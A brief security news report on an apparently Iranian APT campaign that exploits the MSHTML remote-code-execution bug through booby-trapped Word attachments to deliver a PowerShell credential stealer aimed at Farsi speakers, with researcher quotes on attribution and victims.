The MSHTML bug is being used by a newly discovered Iranian APT group that steals Google and Instagram credentials using a new PowerShell-based stealer named “PowerShortShell”. The targets and Farsi-Speakers worldwide.
Another use for the infostealer is to collect system information and Telegram Surveillance from compromised devices sent to attacker-controlled servers together with the stolen credentials.
The attacks started in September as spear-phishing email campaigns as the attacker sent out windows users malicious Winword attachments that exploit the Microsoft MSHTML RCE bug.
The PowerShortShell stealer payload is executed by a DLL downloaded on compromised systems. Once launched, the PowerShell script starts collecting data and screen snapshots, exfiltrating it to the attacker’s command-and-control server.
“The adversary might be tied to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like Infy, Ferocious Kitten, and Rampant Kitten.”
“Almost half of the victims are located in the United States. Based on the Microsoft Word document content – which blames Iran’s leader for the ‘Corona massacre’ and the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime,” said Tomer Bar.
An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.